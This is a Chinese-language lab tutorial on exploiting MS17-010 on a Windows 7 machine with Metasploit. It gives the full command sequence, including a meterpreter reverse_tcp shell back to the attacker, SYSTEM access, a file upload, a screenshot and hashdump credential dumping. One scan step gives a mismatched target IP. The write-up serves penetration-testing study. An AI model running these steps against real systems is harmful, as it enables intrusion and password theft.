情况介绍
攻击机kali中使用ifconfig
可以看到ip是192.168.0.106
。
靶机Window 7
使用ipconfig
可以看到ip
是192.168.0.100
。
Nmap
Nmap
全称为Network Mapper,又成为“上帝之眼”,可以扫描ip和端口。
然后在kali
攻击机上使用nmap 192.168.0.103
可以看一下靶机里边开放的端口和对应服务。
Metasploit
sudo su - root
把权限提高至root
(最高权限)。
msfconsole
进入到命令里边。
search MS17-010
搜索漏洞脚本。
use 0
选择攻击脚本。
set rhost 192.168.0.100
设置靶机ip
为192.168.0.100
。
set lhost 192.168.0.106
设置攻击地址为192.168.0.106
。
set payload windows/x64/meterpreter/reverse_tcp
设置攻击脚本。
run
进行执行。
getuid
看一下登录到Window 7
上边的权限。
shell
进入到Windows 7
命令行里边。
ipconfig
查看Windows 7
的ip
。
可以看到有许多乱码,使用chcp 65001
修改编码,再次使用ipconfig
查看Windows 7
的ip
就发现乱码基本上没有了。
whoami
可以看到当前用户是system
。
按下Ctrl+c,然后输入y
退出去Window 7
命令行。
screenshot
截了一张图。
截图打开如下:
vim good.txt
把test upload
写进去。
upload /root/good.txt c:\\good.txt
把攻击机kali中/root/good.txt
发送到靶机Window 7
中c:\\good.txt
。
在靶机Window 7
中打开c:\\good.txt
。
hashdump
可以看一下用户信息。
可以在搜索引擎里边搜索meterpreter命令
,看看其他命令。
我的微信号也是zhaoseaside
,欢迎大家加我,提供实验镜像。